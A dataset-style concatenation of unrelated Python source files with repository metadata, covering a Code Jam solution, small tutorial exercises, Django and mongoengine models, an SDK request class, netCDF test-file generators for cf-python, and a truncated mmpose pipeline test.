| no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,062 | py | from itertools import \
product, \
permutations, \
combinations, \
combinations_with_replacement
from functools import reduce, lru_cache
from math import floor,ceil,inf,sqrt
def intercept_time(i,j):
if i[1] == j[1]:
return inf
else:
return (j[0]-i[0])/(i[1]-j[1])
def intercept_distance(i,j):
if intercept_time(i,j) < 0:
return inf
else:
return intercept_time(i,j)*i[1] + i[0]
def solve(D, horses):
    # Sort by starting position so horses[-1] is the horse closest to the finish D.
    horses.sort()
    while len(horses) > 1:
        if intercept_distance(horses[-2], horses[-1]) < D:
            # The chaser catches the leader before D, so it is blocked and arrives
            # no later than the leader does: the chaser can be dropped.
            del horses[-2]
        else:
            # The leader reaches D without being caught and constrains nobody
            # behind it: the leader can be dropped.
            del horses[-1]
    # Annie arrives exactly when the last remaining (latest-arriving) horse does.
    return D / intercept_time(horses[0], (D,0))
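# Worked example (numbers invented for illustration): with D = 100 and horses
# (position, speed) = (0, 10) and (50, 2), the faster horse catches the slower one
# at position 62.5 < 100 and is dropped; the remaining horse needs 25 time units to
# reach 100, so solve() returns 100 / 25 = 4.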
if __name__ == '__main__':
import sys,re
data = iter(sys.stdin.read().splitlines())
T = int(next(data))
for (case_num, case) in enumerate(data):
D,N = map(int, case.split())
horses = []
for _ in range(N):
horses.append(tuple(map(int, next(data).split())))
print('Case #{}: {}'.format(case_num+1, solve(D, horses)))
| [
"[email protected]"
]
| |
d6886e124c6a5e23cfe5c3167ad569f20e55a369 | 3cedb583e9f3dfcdf16aeba56a0b3ff7c6213e99 | /python-codes/m2_curso_em_video_estruturas_de_controle/ex048.0.py | 7c2fd6a5930cb1648fc94bfe1920cee6b20f008b | [
"MIT"
]
| permissive | lucasportella/learning-python | 0f39ae2389db6d07b5b8c14ebe0c24f1e93c77c5 | a9449dffd489e7e1f1619e3acef86bc2c64f0f14 | refs/heads/master | 2022-12-26T15:04:12.806300 | 2020-10-14T23:17:47 | 2020-10-14T23:17:47 | 260,685,503 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 273 | py | soma = 0
somaPA = 0
print('All odd numbers that are multiples of 3 up to 500:')
for cont in range(1,501,2):
if cont % 3 == 0:
soma += 1
somaPA += cont
print(cont,end=' ')
print('\n Number of repetitions:', soma)
print('Sum of the AP:', somaPA)
| [
"[email protected]"
]
| |
e45a1fac5b581c35a286bd8251ccc0e3f6475205 | ee4a0698f75aa2500bf2ce1b5e5331bc8b57157a | /myproject/course/models.py | 738e4fda86e0a0457361f274b8a857115dd7a817 | []
| no_license | coderrohanpahwa/one_to_one_model | 5398732410027bfad91c5d5db01e528397c87703 | df4fd8ce89d74d41d49671ba8dd5759b80af3d43 | refs/heads/main | 2022-12-25T14:12:31.253350 | 2020-10-06T08:58:38 | 2020-10-06T08:58:38 | 301,669,111 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 239 | py | from django.db import models
from django.contrib.auth.models import User
from .views import k
# Create your models here.
class Answer(models.Model):
    user = models.OneToOneField(User, on_delete=models.CASCADE)
answer=models.CharField(max_length=100) | [
"[email protected]"
]
| |
e123eb5ce78814907f4c0576ae6dc701c3f31bc2 | c105570f12f1d56087ffb831f5d34cd763d6c90b | /top/api/rest/WlbWaybillIQuerydetailRequest.py | e31f3da969397463b9eaf5940b3a4f8b3c5c3026 | []
| no_license | wjianwei126/Alinone | 01607423833d7736b2fd3c77e9e21f63c69b4e4c | 80144d4657cb049d651c09647eb245405240f12f | refs/heads/master | 2020-12-07T05:14:58.746777 | 2015-05-06T12:48:33 | 2015-05-06T12:48:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 346 | py | '''
Created by auto_sdk on 2014-11-09 14:51:18
'''
from top.api.base import RestApi
class WlbWaybillIQuerydetailRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
self.waybill_detail_query_request = None
def getapiname(self):
return 'taobao.wlb.waybill.i.querydetail'
| [
"[email protected]"
]
| |
d0f1683880dd97dbf57a8ff8ca500f4470b5aa9f | a42ed872908291bbfc5ae2f68968edc4c47edfcf | /lesson_16/choices_test.py | 8c1ac0adaa1e1dc47e02cf3b312e2d5874927c43 | []
| no_license | antonplkv/itea_advanced_august | b87f48cc48134ce1a73e167a5c834322792d0167 | 265c124e79747df75b58a1fd8c5d13605c1041b2 | refs/heads/master | 2023-01-02T23:31:39.050216 | 2020-10-28T19:15:01 | 2020-10-28T19:15:01 | 291,792,884 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 660 | py | import mongoengine as me
me.connect('testtetsttetst')
class Task(me.Document):
LOW_PRIORITY = 1
MEDIUM_PRIORITY = 2
HIGH_PRIORITY = 3
PRIORITIES = (
        (LOW_PRIORITY, 'Low priority'),
        (MEDIUM_PRIORITY, 'Medium priority'),
        (HIGH_PRIORITY, 'High priority')
)
INSIDE_CATEGORY = 1
OUTSIDE_CATEGORY = 2
CATEGORIES = (
        (INSIDE_CATEGORY, 'Problem in the store'),
        (OUTSIDE_CATEGORY, 'Problem in the warehouse'),
)
priority = me.IntField(choices=PRIORITIES)
category = me.IntField(choices=CATEGORIES) | [
"[email protected]"
]
| |
10f47f80b7c9c1ebf1af1c941dbe2dbbc69c281d | a5b4384d1eaef17875499a3f721fedb91afa9fba | /usr/app/wsgi/tests/test_identification.py | 4b2a91ae1772c81ee9d77f68ffac95c017821d1e | []
| no_license | wizardsofindustry/quantum-usr | 85f609b8c08264d69204f696bea0446df19f0eb6 | d49a3dcdf4df2ce31324f5ec98ae5c7130e01cbb | refs/heads/master | 2021-07-18T06:51:16.034613 | 2018-11-23T19:20:23 | 2018-11-23T19:25:16 | 136,974,755 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,983 | py | import unittest
import ioc
import sq.test
import sq.lib.x509
from ....infra import orm
from ..endpoints import IdentificationEndpoint
@sq.test.integration
class X509SubjectIdentificationTestCase(sq.test.SystemTestCase):
gsid ="00000000-0000-0000-0000-000000000000"
metadata = orm.Relation.metadata
def setUp(self):
super(X509SubjectIdentificationTestCase, self).setUp()
self.endpoint = IdentificationEndpoint()
self.service = ioc.require('SubjectIdentificationService')
with open('dev/usr.testing.crt', 'rb') as f:
self.pem = f.read()
self.crt = sq.lib.x509.Certificate.frompem(self.pem)
self.service.associate(self.gsid,
{'type': 'x509', 'crt': bytes.hex(self.pem)})
@unittest.skip
def test_subject_is_identified_by_email(self):
"""Identify a Subject by email."""
request = sq.test.request_factory(
method='POST',
json=[{
'type': 'email',
'email': "[email protected]"
}]
)
response = self.run_callable(self.loop, self.endpoint.handle, request)
def test_subject_is_identified_by_x509(self):
"""Identify a Subject by X.509 certificate."""
dto = {
'type': 'x509',
'crt': bytes.hex(self.pem)
}
request = self.request_factory(method='POST', json=dto)
response = self.run_callable(self.loop, self.endpoint.handle, request)
self.assertEqual(response.status_code, 200)
def test_unknown_principal_type_returns_404(self):
"""Identify a Subject by X.509 certificate."""
dto = {
'type': 'foo',
'crt': bytes.hex(self.pem)
}
request = self.request_factory(method='POST', json=dto)
response = self.run_callable(self.loop, self.endpoint.handle, request)
self.assertEqual(response.status_code, 404)
#pylint: skip-file
| [
"[email protected]"
]
| |
879079013be7911a134b9b62a20ff2df3d5483f6 | 7d852b8d7b8a6ad7fc9c39957e1097509d08e607 | /cf/test/create_test_files.py | e3fd0f5939be75bd460a289c3d6ae479c19c9f7f | [
"MIT"
]
| permissive | AJamesPhillips/cf-python | ca0a7ca8681fe928f069d5809bf067d064265e38 | 4631bc4ba3c0cb51dcd18905116440007e291e6b | refs/heads/master | 2020-09-20T10:04:38.336267 | 2019-11-27T14:07:53 | 2019-11-27T14:07:53 | 224,445,029 | 0 | 0 | MIT | 2019-11-27T14:08:11 | 2019-11-27T14:08:10 | null | UTF-8 | Python | false | false | 23,397 | py | import datetime
import os
import unittest
import numpy
import netCDF4
import cf
def _make_contiguous_file(filename):
n = netCDF4.Dataset(filename, 'w', format='NETCDF3_CLASSIC')
n.Conventions = 'CF-1.7'
n.featureType = 'timeSeries'
station = n.createDimension('station', 4)
obs = n.createDimension('obs' , 24)
name_strlen = n.createDimension('name_strlen', 8)
bounds = n.createDimension('bounds', 2)
lon = n.createVariable('lon', 'f8', ('station',))
lon.standard_name = "longitude"
lon.long_name = "station longitude"
lon.units = "degrees_east"
lon.bounds = "lon_bounds"
lon[...] = [-23, 0, 67, 178]
lon_bounds = n.createVariable('lon_bounds', 'f8', ('station', 'bounds'))
lon_bounds[...] = [[-24, -22],
[ -1, 1],
[ 66, 68],
[177, 179]]
lat = n.createVariable('lat', 'f8', ('station',))
lat.standard_name = "latitude"
lat.long_name = "station latitude"
lat.units = "degrees_north"
lat[...] = [-9, 2, 34, 78]
alt = n.createVariable('alt', 'f8', ('station',))
alt.long_name = "vertical distance above the surface"
alt.standard_name = "height"
alt.units = "m"
alt.positive = "up"
alt.axis = "Z"
alt[...] = [0.5, 12.6, 23.7, 345]
station_name = n.createVariable('station_name', 'S1',
('station', 'name_strlen'))
station_name.long_name = "station name"
station_name.cf_role = "timeseries_id"
station_name[...] = numpy.array([[x for x in 'station1'],
[x for x in 'station2'],
[x for x in 'station3'],
[x for x in 'station4']])
station_info = n.createVariable('station_info', 'i4', ('station',))
station_info.long_name = "some kind of station info"
station_info[...] = [-10, -9, -8, -7]
row_size = n.createVariable('row_size', 'i4', ('station',))
row_size.long_name = "number of observations for this station"
row_size.sample_dimension = "obs"
row_size[...] = [3, 7, 5, 9]
time = n.createVariable('time', 'f8', ('obs',))
time.standard_name = "time"
time.long_name = "time of measurement"
time.units = "days since 1970-01-01 00:00:00"
time.bounds = "time_bounds"
time[ 0: 3] = [-3, -2, -1]
time[ 3:10] = [1, 2, 3, 4, 5, 6, 7]
time[10:15] = [0.5, 1.5, 2.5, 3.5, 4.5]
time[15:24] = range(-2, 7)
time_bounds = n.createVariable('time_bounds', 'f8', ('obs', 'bounds'))
time_bounds[..., 0] = time[...] - 0.5
time_bounds[..., 1] = time[...] + 0.5
humidity = n.createVariable('humidity', 'f8', ('obs',), fill_value=-999.9)
humidity.standard_name = "specific_humidity"
humidity.coordinates = "time lat lon alt station_name station_info"
humidity[ 0: 3] = numpy.arange(0, 3)
humidity[ 3:10] = numpy.arange(1, 71, 10)
humidity[10:15] = numpy.arange(2, 502, 100)
humidity[15:24] = numpy.arange(3, 9003, 1000)
temp = n.createVariable('temp', 'f8', ('obs',), fill_value=-999.9)
temp.standard_name = "air_temperature"
temp.units = "Celsius"
temp.coordinates = "time lat lon alt station_name station_info"
temp[...] = humidity[...] + 273.15
n.close()
return filename
def _make_indexed_file(filename):
n = netCDF4.Dataset(filename, 'w', format='NETCDF3_CLASSIC')
n.Conventions = 'CF-1.7'
n.featureType = 'timeSeries'
station = n.createDimension('station', 4)
obs = n.createDimension('obs' , None)
name_strlen = n.createDimension('name_strlen', 8)
bounds = n.createDimension('bounds', 2)
lon = n.createVariable('lon', 'f8', ('station',))
lon.standard_name = "longitude"
lon.long_name = "station longitude"
lon.units = "degrees_east"
lon.bounds = "lon_bounds"
lon[...] = [-23, 0, 67, 178]
lon_bounds = n.createVariable('lon_bounds', 'f8', ('station', 'bounds'))
lon_bounds[...] = [[-24, -22],
[ -1, 1],
[ 66, 68],
[177, 179]]
lat = n.createVariable('lat', 'f8', ('station',))
lat.standard_name = "latitude"
lat.long_name = "station latitude"
lat.units = "degrees_north"
lat[...] = [-9, 2, 34, 78]
alt = n.createVariable('alt', 'f8', ('station',))
alt.long_name = "vertical distance above the surface"
alt.standard_name = "height"
alt.units = "m"
alt.positive = "up"
alt.axis = "Z"
alt[...] = [0.5, 12.6, 23.7, 345]
station_name = n.createVariable('station_name', 'S1',
('station', 'name_strlen'))
station_name.long_name = "station name"
station_name.cf_role = "timeseries_id"
station_name[...] = numpy.array([[x for x in 'station1'],
[x for x in 'station2'],
[x for x in 'station3'],
[x for x in 'station4']])
station_info = n.createVariable('station_info', 'i4', ('station',))
station_info.long_name = "some kind of station info"
station_info[...] = [-10, -9, -8, -7]
#row_size[...] = [3, 7, 5, 9]
stationIndex = n.createVariable('stationIndex', 'i4', ('obs',))
stationIndex.long_name = "which station this obs is for"
stationIndex.instance_dimension= "station"
stationIndex[...] = [3, 2, 1, 0, 2, 3, 3, 3, 1, 1, 0, 2,
3, 1, 0, 1, 2, 3, 2, 3, 3, 3, 1, 1]
t = [[-3, -2, -1],
[1, 2, 3, 4, 5, 6, 7],
[0.5, 1.5, 2.5, 3.5, 4.5],
range(-2, 7)]
time = n.createVariable('time', 'f8', ('obs',))
time.standard_name = "time";
time.long_name = "time of measurement"
time.units = "days since 1970-01-01 00:00:00"
time.bounds = "time_bounds"
ssi = [0, 0, 0, 0]
for i, si in enumerate(stationIndex[...]):
time[i] = t[si][ssi[si]]
ssi[si] += 1
time_bounds = n.createVariable('time_bounds', 'f8', ('obs', 'bounds'))
time_bounds[..., 0] = time[...] - 0.5
time_bounds[..., 1] = time[...] + 0.5
humidity = n.createVariable('humidity', 'f8', ('obs',), fill_value=-999.9)
humidity.standard_name = "specific_humidity"
humidity.coordinates = "time lat lon alt station_name station_info"
h = [numpy.arange(0, 3),
numpy.arange(1, 71, 10),
numpy.arange(2, 502, 100),
numpy.arange(3, 9003, 1000)]
ssi = [0, 0, 0, 0]
for i, si in enumerate(stationIndex[...]):
humidity[i] = h[si][ssi[si]]
ssi[si] += 1
temp = n.createVariable('temp', 'f8', ('obs',), fill_value=-999.9)
temp.standard_name = "air_temperature"
temp.units = "Celsius"
temp.coordinates = "time lat lon alt station_name station_info"
temp[...] = humidity[...] + 273.15
n.close()
return filename
def _make_indexed_contiguous_file(filename):
n = netCDF4.Dataset(filename, 'w', format='NETCDF3_CLASSIC')
n.Conventions = 'CF-1.6'
n.featureType = "timeSeriesProfile"
# 3 stations
station = n.createDimension('station', 3)
    # 58 profiles spread over 3 stations, each at a different time
profile = n.createDimension('profile', 58)
obs = n.createDimension('obs' , None)
name_strlen = n.createDimension('name_strlen', 8)
bounds = n.createDimension('bounds', 2)
lon = n.createVariable('lon', 'f8', ('station',))
lon.standard_name = "longitude"
lon.long_name = "station longitude"
lon.units = "degrees_east"
lon.bounds = "lon_bounds"
lon[...] = [-23, 0, 67]
lon_bounds = n.createVariable('lon_bounds', 'f8', ('station', 'bounds'))
lon_bounds[...] = [[-24, -22],
[ -1, 1],
[ 66, 68]]
lat = n.createVariable('lat', 'f8', ('station',))
lat.standard_name = "latitude"
lat.long_name = "station latitude"
lat.units = "degrees_north"
lat[...] = [-9, 2, 34]
alt = n.createVariable('alt', 'f8', ('station',))
alt.long_name = "vertical distance above the surface"
alt.standard_name = "height"
alt.units = "m"
alt.positive = "up"
alt.axis = "Z"
alt[...] = [0.5, 12.6, 23.7]
station_name = n.createVariable('station_name', 'S1',
('station', 'name_strlen'))
station_name.long_name = "station name"
station_name.cf_role = "timeseries_id"
station_name[...] = numpy.array([[x for x in 'station1'],
[x for x in 'station2'],
[x for x in 'station3']])
profile = n.createVariable('profile', 'i4', ('profile'))
profile.cf_role = "profile_id"
profile[...] = numpy.arange(58) + 100
station_info = n.createVariable('station_info', 'i4', ('station',))
station_info.long_name = "some kind of station info"
station_info[...] = [-10, -9, -8]
stationIndex = n.createVariable('stationIndex', 'i4', ('profile',))
stationIndex.long_name = "which station this profile is for"
stationIndex.instance_dimension= "station"
stationIndex[...] = [2, 1, 0, 2, 1, 1, 0, 2,
1, 0, 1, 2, 2, 1, 1,
2, 1, 0, 2, 1, 1, 0, 2,
1, 0, 1, 2, 2, 1, 1,
2, 1, 0, 2, 1, 1, 0, 2,
1, 0, 1, 2, 2, 1, 1,
2, 1, 0, 2, 1, 1, 0, 2,
1, 0, 1, 2, 2]
# station N has list(stationIndex[...]).count(N) profiles
row_size = n.createVariable('row_size', 'i4', ('profile',))
row_size.long_name = "number of observations for this profile"
row_size.sample_dimension = "obs"
row_size[...] = [1, 4, 1, 3, 2, 2, 3, 3, 1, 2, 2, 3, 2, 2, 2, 2, 1, 2, 1, 3, 3, 2, 1,
3, 1, 3, 2, 3, 1, 3, 3, 2, 2, 2, 1, 1, 1, 3, 1, 1, 2, 1, 1, 3, 3, 2,
2, 2, 2, 1, 2, 3, 3, 3, 2, 3, 1, 1] # sum = 118
time = n.createVariable('time', 'f8', ('profile',))
time.standard_name = "time"
time.long_name = "time"
time.units = "days since 1970-01-01 00:00:00"
time.bounds = "time_bounds"
t0 = [3, 0, -3]
ssi = [0, 0, 0]
for i, si in enumerate(stationIndex[...]):
time[i] = t0[si] + ssi[si]
ssi[si] += 1
time_bounds = n.createVariable('time_bounds', 'f8', ('profile', 'bounds'))
time_bounds[..., 0] = time[...] - 0.5
time_bounds[..., 1] = time[...] + 0.5
z = n.createVariable('z', 'f8', ('obs',))
z.standard_name = "altitude"
z.long_name = "height above mean sea level"
z.units = "km"
z.axis = "Z"
z.positive = "up"
z.bounds = "z_bounds"
# z0 = [1, 0, 3]
# i = 0
# for s, r in zip(stationIndex[...], row_size[...]):
# z[i:i+r] = z0[s] + numpy.sort(numpy.random.uniform(0, numpy.random.uniform(1, 2), r))
# i += r
data = [3.51977705293769, 0.521185292100177, 0.575154265863394,
1.08495843717095, 1.37710968624395, 2.07123455611723, 3.47064474274781,
3.88569849023813, 4.81069254279537, 0.264339600625496, 0.915704970094182,
0.0701532210336895, 0.395517651420933, 1.00657582854276,
1.17721374303641, 1.82189345615046, 3.52424307197668, 3.93200473199559,
3.95715099603671, 1.57047493027102, 1.09938982652955, 1.17768722826975,
0.251803399458277, 1.59673486865804, 4.02868944763605, 4.03749228832264,
4.79858281590985, 3.00019933315412, 3.65124061660449, 0.458463542157766,
0.978678197083262, 0.0561560792556281, 0.31182013232255,
3.33350065357286, 4.33143904011861, 0.377894196412131, 1.63020681064712,
2.00097025264771, 3.76948048424458, 0.572927165845568, 1.29408313557905,
1.81296270533192, 0.387142669131077, 0.693459187515738, 1.69261930636298,
1.38258797228361, 1.82590759889566, 3.34993297710761, 0.725250730922501,
1.38221693486728, 1.59828555215646, 1.59281225554253, 0.452340646918555,
0.976663373825433, 1.12640496317618, 3.19366847375422, 3.37209133117904,
3.40665008236976, 3.53525896684001, 4.10444186715724, 0.14920937817654,
0.0907197953552753, 0.42527916794473, 0.618685137936187,
3.01900591447357, 3.37205542289986, 3.86957342976163, 0.17175098751914,
0.990040375014957, 1.57011428605984, 2.12140567043994, 3.24374743730506,
4.24042441581785, 0.929509749153725, 0.0711997786817564,
2.25090028461898, 3.31520955860746, 3.49482624434274, 3.96812568493549,
1.5681807261767, 1.79993011515465, 0.068325990211909, 0.124469638352167,
3.31990436971169, 3.84766748039389, 0.451973490541035, 1.24303219956085,
1.30478004656262, 0.351892459787624, 0.683685812990457,
0.788883736575568, 3.73033428872491, 3.99479807507392, 0.811582011950481,
1.2241242448019, 1.25563109687369, 2.16603674712822, 3.00010622131408,
3.90637137662453, 0.589586644805982, 0.104656387266266,
0.961185900148304, 1.05120351477824, 1.29460917520233, 2.10139985693684,
3.64252693587415, 3.91197236350995, 4.56466622863717, 0.556476687600461,
0.783717448678148, 0.910917550635007, 1.59750076220451, 1.97101264162631,
0.714693043642084, 0.904381625638779, 1.03767817888021, 4.10124675852254,
3.1059214185543]
data = numpy.around(data, 2)
z[...] = data
z_bounds = n.createVariable('z_bounds', 'f8', ('obs', 'bounds'))
z_bounds[..., 0] = z[...] - 0.01
z_bounds[..., 1] = z[...] + 0.01
humidity = n.createVariable('humidity', 'f8', ('obs',), fill_value=-999.9)
humidity.standard_name = "specific_humidity"
humidity.coordinates = "time lat lon alt z station_name station_info profile"
data *= 10
data = numpy.around(data, 2)
humidity[...] = data
temp = n.createVariable('temp', 'f8', ('obs',), fill_value=-999.9)
temp.standard_name = "air_temperature"
temp.units = "Celsius"
temp.coordinates = "time lat lon alt z station_name station_info profile"
data += 2731.5
data = numpy.around(data, 2)
temp[...] = data
n.close()
return filename
contiguous_file = _make_contiguous_file('DSG_timeSeries_contiguous.nc')
indexed_file = _make_indexed_file('DSG_timeSeries_indexed.nc')
indexed_contiguous_file = _make_indexed_contiguous_file('DSG_timeSeriesProfile_indexed_contiguous.nc')
def _make_external_files():
'''
'''
def _pp(filename, parent=False, external=False, combined=False, external_missing=False):
'''
'''
nc = netCDF4.Dataset(filename, 'w', format='NETCDF3_CLASSIC')
nc.createDimension('grid_latitude', 10)
nc.createDimension('grid_longitude', 9)
nc.Conventions = 'CF-1.7'
if parent:
nc.external_variables = 'areacella'
if parent or combined or external_missing:
grid_latitude = nc.createVariable(dimensions=('grid_latitude',),
datatype='f8',
varname='grid_latitude')
grid_latitude.setncatts({'units': 'degrees', 'standard_name': 'grid_latitude'})
grid_latitude[...] = range(10)
grid_longitude = nc.createVariable(dimensions=('grid_longitude',),
datatype='f8',
varname='grid_longitude')
grid_longitude.setncatts({'units': 'degrees', 'standard_name': 'grid_longitude'})
grid_longitude[...] = range(9)
latitude = nc.createVariable(dimensions=('grid_latitude', 'grid_longitude'),
datatype='i4',
varname='latitude')
latitude.setncatts({'units': 'degree_N', 'standard_name': 'latitude'})
latitude[...] = numpy.arange(90).reshape(10, 9)
longitude = nc.createVariable(dimensions=('grid_longitude', 'grid_latitude'),
datatype='i4',
varname='longitude')
longitude.setncatts({'units': 'degreeE', 'standard_name': 'longitude'})
longitude[...] = numpy.arange(90).reshape(9, 10)
eastward_wind = nc.createVariable(dimensions=('grid_latitude', 'grid_longitude'),
datatype='f8',
varname=u'eastward_wind')
eastward_wind.coordinates = u'latitude longitude'
eastward_wind.standard_name = 'eastward_wind'
eastward_wind.cell_methods = 'grid_longitude: mean (interval: 1 day comment: ok) grid_latitude: maximum where sea'
eastward_wind.cell_measures = 'area: areacella'
eastward_wind.units = 'm s-1'
eastward_wind[...] = numpy.arange(90).reshape(10, 9) - 45.5
if external or combined:
areacella = nc.createVariable(dimensions=('grid_longitude', 'grid_latitude'),
datatype='f8',
varname='areacella')
areacella.setncatts({'units': 'm2', 'standard_name': 'cell_area'})
areacella[...] = numpy.arange(90).reshape(9, 10) + 100000.5
nc.close()
#--- End: def
parent_file = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'parent.nc')
external_file = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'external.nc')
combined_file = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'combined.nc')
external_missing_file = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'external_missing.nc')
_pp(parent_file , parent=True)
_pp(external_file , external=True)
_pp(combined_file , combined=True)
_pp(external_missing_file, external_missing=True)
return parent_file, external_file, combined_file, external_missing_file
(parent_file,
external_file,
combined_file,
external_missing_file) = _make_external_files()
def _make_gathered_file(filename):
'''
'''
def _jj(shape, list_values):
array = numpy.ma.masked_all(shape)
for i, (index, x) in enumerate(numpy.ndenumerate(array)):
if i in list_values:
array[index] = i
return array
#--- End: def
n = netCDF4.Dataset(filename, 'w', format='NETCDF3_CLASSIC')
n.Conventions = 'CF-1.6'
time = n.createDimension('time' , 2)
height = n.createDimension('height' , 3)
lat = n.createDimension('lat' , 4)
lon = n.createDimension('lon' , 5)
p = n.createDimension('p' , 6)
list1 = n.createDimension('list1', 4)
list2 = n.createDimension('list2', 9)
list3 = n.createDimension('list3', 14)
# Dimension coordinate variables
time = n.createVariable('time', 'f8', ('time',))
time.standard_name = "time"
time.units = "days since 2000-1-1"
time[...] = [31, 60]
height = n.createVariable('height', 'f8', ('height',))
height.standard_name = "height"
height.units = "metres"
height.positive = "up"
height[...] = [0.5, 1.5, 2.5]
lat = n.createVariable('lat', 'f8', ('lat',))
lat.standard_name = "latitude"
lat.units = "degrees_north"
lat[...] = [-90, -85, -80, -75]
p = n.createVariable('p', 'i4', ('p',))
p.long_name = "pseudolevel"
p[...] = [1, 2, 3, 4, 5, 6]
# Auxiliary coordinate variables
aux0 = n.createVariable('aux0', 'f8', ('list1',))
aux0.standard_name = "longitude"
aux0.units = "degrees_east"
aux0[...] = numpy.arange(list1.size)
aux1 = n.createVariable('aux1', 'f8', ('list3',))
aux1[...] = numpy.arange(list3.size)
aux2 = n.createVariable('aux2', 'f8', ('time', 'list3', 'p'))
aux2[...] = numpy.arange(time.size * list3.size * p.size).reshape(time.size, list3.size, p.size)
aux3 = n.createVariable('aux3', 'f8', ('p', 'list3', 'time'))
aux3[...] = numpy.arange(p.size * list3.size * time.size).reshape(p.size, list3.size, time.size)
aux4 = n.createVariable('aux4', 'f8', ('p', 'time', 'list3'))
aux4[...] = numpy.arange(p.size * time.size * list3.size).reshape(p.size, time.size, list3.size)
aux5 = n.createVariable('aux5', 'f8', ('list3', 'p', 'time'))
aux5[...] = numpy.arange(list3.size * p.size * time.size).reshape(list3.size, p.size, time.size)
aux6 = n.createVariable('aux6', 'f8', ('list3', 'time'))
aux6[...] = numpy.arange(list3.size * time.size).reshape(list3.size, time.size)
aux7 = n.createVariable('aux7', 'f8', ('lat',))
aux7[...] = numpy.arange(lat.size)
aux8 = n.createVariable('aux8', 'f8', ('lon', 'lat',))
aux8[...] = numpy.arange(lon.size * lat.size).reshape(lon.size, lat.size)
aux9 = n.createVariable('aux9', 'f8', ('time', 'height'))
aux9[...] = numpy.arange(time.size * height.size).reshape(time.size, height.size)
# List variables
list1 = n.createVariable('list1', 'i', ('list1',))
list1.compress = "lon"
list1[...] = [0, 1, 3, 4]
list2 = n.createVariable('list2', 'i', ('list2',))
list2.compress = "lat lon"
list2[...] = [0, 1, 5, 6, 13, 14, 17, 18, 19]
list3 = n.createVariable('list3', 'i', ('list3',))
list3.compress = "height lat lon"
array = _jj((3, 4, 5),
[0, 1, 5, 6, 13, 14, 25, 26, 37, 38, 48, 49, 58, 59])
list3[...] = array.compressed()
# Data variables
temp1 = n.createVariable('temp1', 'f8', ('time', 'height', 'lat', 'list1', 'p'))
temp1.long_name = "temp1"
temp1.units = "K"
temp1.coordinates = "aux0 aux7 aux8 aux9"
temp1[...] = numpy.arange(2*3*4*4*6).reshape(2, 3, 4, 4, 6)
temp2 = n.createVariable('temp2', 'f8', ('time', 'height', 'list2', 'p'))
temp2.long_name = "temp2"
temp2.units = "K"
temp2.coordinates = "aux7 aux8 aux9"
temp2[...] = numpy.arange(2*3*9*6).reshape(2, 3, 9, 6)
temp3 = n.createVariable('temp3', 'f8', ('time', 'list3', 'p'))
temp3.long_name = "temp3"
temp3.units = "K"
temp3.coordinates = "aux0 aux1 aux2 aux3 aux4 aux5 aux6 aux7 aux8 aux9"
temp3[...] = numpy.arange(2*14*6).reshape(2, 14, 6)
n.close()
return filename
gathered = _make_gathered_file('gathered.nc')
if __name__ == '__main__':
print('Run date:', datetime.datetime.utcnow())
print(cf.environment(display=False))
print()
unittest.main(verbosity=2)
| [
"[email protected]"
]
| |
579e5cbdefc699b964e62dbd7f5acf9f3aee439e | 36fbba7b0823e04062c41f26385ed71da5b4f4d4 | /tests/test_pipelines/test_bottom_up_pipelines.py | f687ecb2a385b85dc28988e7ed7937410b446a76 | [
"Apache-2.0"
]
| permissive | cherryjm/mmpose | 2fcd4504a0a0d46f6a4dce6d0be1141fdead6bb5 | b0acfc423da672e61db75e00df9da106b6ead574 | refs/heads/master | 2023-06-12T10:15:45.964450 | 2021-05-07T06:06:31 | 2021-05-07T06:06:31 | 346,599,724 | 1 | 0 | Apache-2.0 | 2021-03-11T06:22:06 | 2021-03-11T06:22:05 | null | UTF-8 | Python | false | false | 12,297 | py | import copy
import os.path as osp
import numpy as np
import pytest
import xtcocotools
from xtcocotools.coco import COCO
from mmpose.datasets.pipelines import (BottomUpGenerateHeatmapTarget,
BottomUpGeneratePAFTarget,
BottomUpGenerateTarget,
BottomUpGetImgSize,
BottomUpRandomAffine,
BottomUpRandomFlip, BottomUpResizeAlign,
LoadImageFromFile)
def _get_mask(coco, anno, img_id):
img_info = coco.loadImgs(img_id)[0]
m = np.zeros((img_info['height'], img_info['width']), dtype=np.float32)
for obj in anno:
if obj['iscrowd']:
rle = xtcocotools.mask.frPyObjects(obj['segmentation'],
img_info['height'],
img_info['width'])
m += xtcocotools.mask.decode(rle)
elif obj['num_keypoints'] == 0:
rles = xtcocotools.mask.frPyObjects(obj['segmentation'],
img_info['height'],
img_info['width'])
for rle in rles:
m += xtcocotools.mask.decode(rle)
return m < 0.5
def _get_joints(anno, ann_info, int_sigma):
num_people = len(anno)
if ann_info['scale_aware_sigma']:
joints = np.zeros((num_people, ann_info['num_joints'], 4),
dtype=np.float32)
else:
joints = np.zeros((num_people, ann_info['num_joints'], 3),
dtype=np.float32)
for i, obj in enumerate(anno):
joints[i, :ann_info['num_joints'], :3] = \
np.array(obj['keypoints']).reshape([-1, 3])
if ann_info['scale_aware_sigma']:
# get person box
box = obj['bbox']
size = max(box[2], box[3])
sigma = size / 256 * 2
if int_sigma:
sigma = int(np.ceil(sigma))
assert sigma > 0, sigma
joints[i, :, 3] = sigma
return joints
def _check_flip(origin_imgs, result_imgs):
"""Check if the origin_imgs are flipped correctly."""
h, w, c = origin_imgs.shape
for i in range(h):
for j in range(w):
for k in range(c):
if result_imgs[i, j, k] != origin_imgs[i, w - 1 - j, k]:
return False
return True
def test_bottomup_pipeline():
data_prefix = 'tests/data/coco/'
ann_file = osp.join(data_prefix, 'test_coco.json')
coco = COCO(ann_file)
ann_info = {}
ann_info['flip_pairs'] = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10],
[11, 12], [13, 14], [15, 16]]
ann_info['flip_index'] = [
